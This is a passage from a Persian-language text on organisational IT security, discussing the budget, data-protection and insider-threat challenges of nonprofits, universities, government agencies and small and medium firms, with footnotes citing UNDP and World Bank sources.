‫ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻮﺩﺟﻪ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺍﺯ ﻛﻴﻔﻴﺖ ﭘـﺎﻳﻴﻨﺘﺮﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺗﺠﺮﺑـﺔ ﻛﻤﺘـﺮﻱ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ ﻣﻌﻤـﻮ ﹰ‬
‫ﻛﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺩﺍﺭﻧﺪ ﻭ ﻟﺬﺍ ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺧـﺪﻣﺎﺕ ﻣـﺪﺍﻭﻡ ﺑـﻪ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻛﻨﻨـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻫﺪﺍﻛﻨﻨـﺪﮔﺎﻥ ﻛﻤﻜﻬـﺎﻱ ﻣـﺎﻟﻲ‪،‬‬
‫ﻧﺎﻇﺮﻳﻦ‪ ،‬ﻭ ﻣﺆﺳﺴﺎﺕ ﻫﻤﻜﺎﺭ ﺧﻮﺩ ﻳﻚ ﻭﺟﻬﺔ ﻣﺜﺒﺖ ﺍﺯ ﻭﺿـﻌﻴﺖ‬
‫ﻭ ﻓﻌﺎﻟﻴﺖ ﻣﺆﺳﺴﻪ ﺑﻪ ﺗﺼﻮﻳﺮ ﺑﻜﺸﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣـﺸﻜﻼﺗﻲ‬
‫ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﺩﺍﻧﺸﮕﺎﻫﻬﺎ‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ‪ ،‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻧﻴـﺰ‬
‫ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺑﻮﺩﺟﻪﺍﻱ‪ ،‬ﺷﺒﻜﻪﻫﺎﻱ ﻫﺰﻳﻨـﻪﺑـﺮ‪ ،‬ﻭ‬
‫ﺩﺍﻣﻨﺔ ﻭﺳﻴﻌﻲ ﺍﺯ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻓﻨﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺑﺎ ﻳﻜﺴﺮﻱ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﺭﻭﺑـﺮﻭ ﺑﺎﺷـﻨﺪ؛ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ‬
‫ﻼ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﺮﺍﻱ ﭘﺮ ﻛﺮﺩﻥ ﺍﻭﻗﺎﺕ ﻓﺮﺍﻏﺖ ﺧـﻮﺩ‬
‫ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺜ ﹰ‬
‫ﺑﺨﻮﺍﻫﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﺄﺳﻴﺴﺎﺕ ﺩﺍﻧﺸﮕﺎﻩ ﻧﻔﻮﺫ ﻛﻨﻨـﺪ! ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺍﻳﻦ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭﺍﺣـﺪﻱ ﻋﻤـﻞ‬
‫ﻛﻨﻨﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻠﺰﻡ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﻣﻘـﺮﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ‬
‫ﻣﺤﻴﻂ ﺩﺍﻧـﺸﮕﺎﻩ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ ﺑـﺴﻴﺎﺭ ﺣـﺎﺋﺰ‬
‫ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻬﻤﻲ ﺍﺯ ﻗﺒﻴﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﭘﺰﺷـﻜﻲ ﻭ ﺍﺳـﻨﺎﺩ‬
‫ﺁﻣﻮﺯﺷﻲ ﺍﺳﺖ‪ .‬ﻣﻬﺎﺟﻤﻴﻦ ﺑﺎﻟﻘﻮﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺭﺍ‬
‫ﺑﺪﺯﺩﻧﺪ‪ ،‬ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺑـﻴﻦ ﺑﺒﺮﻧـﺪ؛ ﻭ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ ﺍﻋﺘﺒـﺎﺭ‬
‫ﺩﺍﻧﺸﮕﺎﻩ ﺁﺳﻴﺐ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳـﺎﺱ ﻛـﺎﺭﺁﻳﻲ‪ ،‬ﺳـﻬﻮﻟﺖ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ‬
‫ﮔﻴــﺮﺩ‪ .‬ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﺑﻄــﻮﺭ ﻛﻠــﻲ ﺩﺭ ﺑﺎﻓﺘﻬــﺎﻱ ﺩﻭﻟﺘــﻲ ﻣــﺴﺌﻠﻪ‬
‫ﺳــﻮﺩﺁﻭﺭﻱ ﻣﻄــﺮﺡ ﻧﻴــﺴﺖ‪ ،‬ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﻣــﺸﺎﺑﻪ ﻣﺆﺳــﺴﺎﺕ‬
‫ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﻭﻱ ﺑﻮﺩﺟﻪ ﻛﻨﺘﺮﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﺗﻮﺍﻧــﺎﻳﻲ ﺳــﺎﺯﻣﺎﻥ ﺩﺭ ﺗﻬﻴــﺔ ﺟﺪﻳــﺪﺗﺮﻳﻦ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ‬
‫‪١٢٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ‪ .‬ﻫﻤﺰﻣـﺎﻥ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺮ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻧﻴﺰ ﺗﻤﺮﻛﺰ ﻛﻨﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫﺎﻳـﺸﺎﻥ‬
‫ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻓـﺮﺍﺩ ﺍﺳـﺖ؛ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ‬
‫ﻗﺒﻴﻞ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻭ ﺳﻮﺍﺑﻖ ﭘﺰﺷﻜﻲ‪ ،‬ﺟﻨﺎﻳﻲ‪ ،‬ﻭ ﻣﺎﻟﻴﺎﺗﻲ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ ﻧﻴـﺰ‬
‫ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺍﺳـﺖ ﻭ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻨـﺴﻮﺥ‪،‬‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻧﺎﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩﺍﻱ ﻛﻪ ﻓﺎﻗﺪ‬
‫ﺷﺎﻳﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺭﻧﺞ‬
‫ﻣﻲﺑﺮﺩ‪ .‬ﻫﻤﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ‪،‬‬
‫ﺩﻭﻟﺖ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﻪ ﺗﺼﻮﻳﺮ ﻋﻤـﻮﻣﻲ ﺍﻳﺠﺎﺩﺷـﺪﻩ ﺍﺯ ﺧـﻮﺩ ﭘـﺲ ﺍﺯ‬
‫ﺧﺒﺮﻱ ﻭ ﺭﺳﺎﻧﻪﺍﻱ ﺷﺪﻥ ﻫﺮ ﻧﻔﻮﺫ ﻳﺎ ﺭﺧﺪﺍﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴﺖ‬
‫ﺩﻫﺪ‪.‬‬
‫‪ ٦UNDP‬ﺩﺭ ﮔﺰﺍﺭﺵ ﺍﺧﻴـﺮ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻭﺿـﻌﻴﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﻃـﺮﺡ ﻛﻠـﻲ ﺑﻌـﻀﻲ‬
‫ﭼﺎﻟﺸﻬﺎﻳﻲ ﻛﻪ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻋﺼﺮ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ‬
‫ﻫﺴﺘﻨﺪ ﭘﺮﺩﺍﺧﺖ‪ ٧.‬ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭼﻨﺪ ﺳﺮﻱ ﮔﺰﺍﺭﺵ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ‬
‫ﺗﻮﺳﻌﻪ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺍﺳـﺖ‪ ٨.‬ﺍﮔﺮﭼـﻪ‬
‫ﺗﺠﺮﺑﻴﺎﺕ ﻓﻨﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺟﻬـﺎﻥ ﺻـﻨﻌﺘﻲ ﺍﺯ ﺑﻌـﻀﻲ ﺟﻬـﺎﺕ‬
‫ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ )ﻣﻘﻴﺎﺱ‪ ،‬ﻫﺰﻳﻨﻪﻫﺎ‪ ،‬ﻭ ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﻛﻨـﺎﻥ(‪ ،‬ﺍﻣﺎ ﺍﺯ‬
‫ﻧﻘﺎﻁ ﻗﺪﺭﺕ ﻭ ﺿﻌﻒ ﺁﻧﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭﺳﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﮔﺮﻓﺖ‪ .‬ﺗﻌﺪﺍﺩ ﻣﺆﺳﺴﺎﺕ ﺑﺰﺭﮒ ﻛﻤﺘﺮ‬
‫ﺍﺳﺖ ﻭ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﻭﻳـﮋﻩ ﻭ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭﺳـﻴﻌﺘﺮﻱ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﻣﻴﺎﻥ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺘﻲ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣــﺴﺌﻮﻻﻥ ﻣﺮﺍﻛــﺰ ﻣﺨــﺎﺭﺝ‪ ،‬ﻣــﺪﻳﺮﺍﻥ ﺍﺭﺷــﺪ ﻣــﺎﻟﻲ ﺑﻌﻨــﻮﺍﻥ‬
‫ﻛﻨﺘﺮﻝﻛﻨﻨﺪﮔﺎﻥ ﻫﺰﻳﻨﻪ‪ ،‬ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺳﺎﺯﻣﺎﻥ )ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ‬
‫‪٩‬‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻓﺮﻭﺵ ﻭ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ‪ ،‬ﻭ ﻣﺤـﺼﻮﻻﺕ( ﺗﻨـﺸﻬﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪United Nations Development Program‬‬
‫‪۷‬‬
‫ﺭﺟﻮﻉ ﻛﻨﻴﺪ ﺑﻪ ﮔﺰﺍﺭﺵ ﺗﻮﺳﻌﺔ ﺍﻧﺴﺎﻧﻲ ﺳﺎﻝ ‪:۲۰۰۱‬‬
‫‪"Making New Technologies Work for Human‬‬
‫)‪Development" (UNDP: NY, 2001‬‬
‫‪۸‬‬
‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻣﻨﺎﺑﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﭘـﺮﻭﮊﻩﻫـﺎﻱ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺆﺳـﺴﺔ ﺭﺍﻫﺒـﺮﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )‪(ITGI‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.worldbank.com‬‬
‫‪http://www.itgi.org‬‬
‫‪۹‬‬
‫ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻓﻨﻲ ﺑﺰﺭﮔﺘﺮ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺎﺯﻩﻛـﺎﺭﻱ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ‬
‫ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺴﺮﻋﺖ ﺭﺷﺪ ﻛﻨﻨﺪ‪ ،‬ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ‬
‫‪6‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻨﺎﺑﻊ ﻛﻤﺘﺮﻱ ﺑـﺮﺍﻱ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‪،‬‬
‫ﺳﺎﺧﺘﺎﺭ ﻣﺴﻄﺢﺗﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ‪ ،‬ﻭ ﺍﻋﺘﻤﺎﺩ ﺑﻴﺸﺘﺮﻱ ﺑﻪ ﭘﺎﻳﮕﺎﻩ‬
‫ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺍﺭﻧــﺪ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑـﺰﺭﮒ‪ ،‬ﺷـﻔﺎﻓﺘﺮ‬
‫ﺑﺎﺷــﻨﺪ ﻭ ﻟــﺬﺍ ﺩﺭ ﭼﻨــﻴﻦ ﺳــﺎﺧﺘﺎﺭﻱ ﻛــﻪ ﺩﺭ ﺁﻥ ﺍﻳــﻦ ﻣﻘــﺪﺍﺭ ﺍﺯ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺷــﺮﻛﺖ ﺑــﺮﺍﻱ ﻫﻤــﺔ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺭ ﺩﺳــﺘﺮﺱ ﺍﺳــﺖ‬
‫ﻲ ﺫﺍﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﺪﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻳﺎ ﻣﺸﺎﻭﺭ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﻮﻳﺘﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺷـﺮﻛﺖ‬
‫ﺍﺳﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﻪ ﺩﺭ ﻟﺒـﺔ‬
‫ﻓﻨﺎﻭﺭﻱ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨـﺪ ﺍﻳـﻦ ﺧﻄـﺮ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﺎﻟﻜﻴـﺖ‬
‫ﻧﻮﺁﻭﺭﻳﻬﺎ ﻭ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺯ ﺳﺮﻗﺖ ﻳﺎ ﺗﺨﺮﻳﺐ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺍﻳـﻦ ﻣـﺸﻜﻼﺕ‪ ،‬ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ‬
‫ﻣﺘﻮﺳﻂ ﺑﺎﻳﺪ ﻣﺮﻭﺭﻱ ﻛﺎﻣﻞ ﺑﺮ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ‪ ،‬ﺍﻫﺪﺍﻑ‪ ،‬ﺻـﻼﺣﻴﺘﻬﺎ ﻭ‬
‫ﻛﻪ ﻫﺮ ﻳﻚ ﺩﺭ ﻳﻚ ﺣﻮﺯﺓ ﺗﺠﺎﺭﻱ ﻳﺎ ﻓﻨﻲ ﻣﺘﺨﺼﺺ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻧﻘﺸﻬﺎ‬
‫ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ )ﻭﻟﻲ ﺑﻪ ﺁﻧﻬﺎ ﻣﺤﺪﻭﺩ ﻧﻤﻲﺷـﻮﻧﺪ(‪ :‬ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺍﺟﺮﺍﻳـﻲ‬
‫)‪ ،(CEO‬ﻣــﺪﻳﺮ ﺍﺭﺷــﺪ ﺍﻣــﻮﺭ ﻣــﺎﻟﻲ )‪ ،(CFO‬ﻣــﺪﻳﺮ ﺍﺭﺷــﺪ ﻓﻨــﺎﻭﺭﻱ‬
‫)‪ ،(CTO‬ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ )‪ ،(CIO‬ﻭ ﺑﺘﺎﺯﮔﻲ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻣﻨﻴـﺖ‬
‫)‪ .(CSO‬ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﻤﻮﻟﻲ ﻳﻚ ﺳﻠﺴﻠﻪ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ‬
‫ﻗﺎﺋﻢﻣﻘﺎﻣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻗﺒﻴﻞ ﻗﺎﺋﻢﻣﻘﺎﻡ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ‪ ،‬ﻓـﺮﻭﺵ‪ ،‬ﻭ ﺗﻮﺳـﻌﺔ‬
‫ﺑﺎﺯﺭﮔﺎﻧﻲ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﺭﺳـﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻛﻮﭼﻜﺘﺮ ﺿﺮﻭﺭﺗﻲ ﻧﺪﺍﺭﺩ )ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﻥ ﻣﻴـﺴﺮ ﻧﻴـﺴﺖ(‪ ،‬ﻣـﺸﺎﻫﺪﺓ ﭼﮕـﻮﻧﮕﻲ‬
‫ﺗﻘﺴﻴﻢ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻭ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﻫﻤﻴـﺖ‬
‫‪ CSO‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ؛‬
‫ﻣﻮﺗﻮﺭﻫﺎﻱ ﺭﺷﺪ ﻭ ﺗﺮﻗﻲ‬
‫ﺑﺪﻭﻥ ﺑﺮﻧﺎﻣﺔ ﻛﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻫﺮ ﻗﺴﻤﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺍﻣﻨﻴﺖ ﺗﻮﺳﻌﻪ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ‪ ،‬ﺍﻫﺪﺍﻑ‪ ،‬ﻭ ﻣﻘﺎﺻﺪ ﻋﻤﻠﻴـﺎﺗﻲ‬
‫ﻫﻤﺎﻥ ﻗﺴﻤﺖ ﻧﺎﺷﻲ ﺷﺪﻩ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻫﻤـﺎﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﻣﻨﺎﺳﺐ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﭼﻨـﺪﺍﻥ‬
‫ﺑﻪ ﻛﺎﺭ ﻧﻴﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻳﺎ ﻛﻤﺘـﺮ ﺍﺯ ﺣـﺪ‬
‫ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻭﺟـﻮﺩ ﻧﻈـﺎﺭﺕ ﺍﺯ ﻃـﺮﻑ‬
‫ﻣﺪﻳﺮﻳﺖ ﺳﻄﻮﺡ ﺑﺎﻻ ﺗﻀﻤﻴﻦ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛـﻪ ﺗﺠـﺎﺭﺏ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﻋﻤﻠﻜـﺮﺩ‬
